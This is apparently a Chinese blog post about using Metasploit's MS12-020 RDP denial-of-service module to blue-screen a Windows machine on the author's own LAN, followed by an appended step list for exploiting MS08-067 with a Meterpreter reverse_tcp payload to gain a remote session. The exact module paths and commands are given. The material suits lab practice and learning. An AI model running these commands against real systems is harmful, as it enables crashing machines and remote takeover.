kali linux ms12_020漏洞导致目标机器蓝屏

本文介绍了一次使用Metasploit框架中MS12-020漏洞攻击模块的实际操作过程。通过设置攻击主机并运行模块,成功使目标局域网内的Windows机器蓝屏。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

先搜索ms12_020 第一个就是攻击模块

use auxiliary/dos/windows/rdp/ms12_020_maxchannelids

进入模块


设置攻击主机 set rhost   192.168.205.129  

这个机器是我的局域网机器

现在一切ok了 

运行 exploit


攻击完成  查看一下我的局域网主机

已经蓝屏  我就不截图了 

要利用MS08_067漏洞进行渗透测试,首先需要确保你的Kali Linux环境已经搭建好,并安装了Metasploit框架。以下是详细步骤: 参考资源链接:[2022太原理工大学网络攻防实验:MS08_067漏洞与渗透测试](https://wenku.youkuaiyun.com/doc/7bkch3qp7u?spm=1055.2569.3001.10343) 1. 打开Kali Linux系统,启动Metasploit框架。 2. 在Metasploit中搜索MS08_067漏洞的exploit模块,可以通过输入命令'search ms08_067'来查找。 3. 加载找到的exploit模块,使用命令'exploit/windows/smb/ms08_067_netapi'。 4. 设置攻击载荷(payload),可以使用'payload windows/meterpreter/reverse_tcp',同时配置LHOST和LPORT,以确保攻击者机器能够接收反向连接。 5. 指定目标主机的RHOST选项,即攻击的目标IP地址。 6. 运行exploit模块,如果目标存在MS08_067漏洞,Metasploit将会尝试建立连接并执行载荷。 7. 成功后,攻击者将获得目标系统的Meterpreter会话,进而可以执行进一步的内网渗透和横向移动。 8. 了解并掌握这些步骤后,建议深入学习如何在合法的靶场环境中进行实践,以便更好地理解和应用这些概念。 通过以上步骤,你将能够掌握在Kali Linux中使用Metasploit利用MS08_067漏洞进行渗透测试的基本技能。为了更深入理解网络攻防技术,建议阅读《2022太原理工大学网络攻防实验:MS08_067漏洞与渗透测试》。该资料详细介绍了MS08_067漏洞的验证与利用,并结合了其他关键实验,如SQL注入、文件上传和文件包含漏洞的利用与防护,为你提供全面的渗透测试学习路径。 参考资源链接:[2022太原理工大学网络攻防实验:MS08_067漏洞与渗透测试](https://wenku.youkuaiyun.com/doc/7bkch3qp7u?spm=1055.2569.3001.10343)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值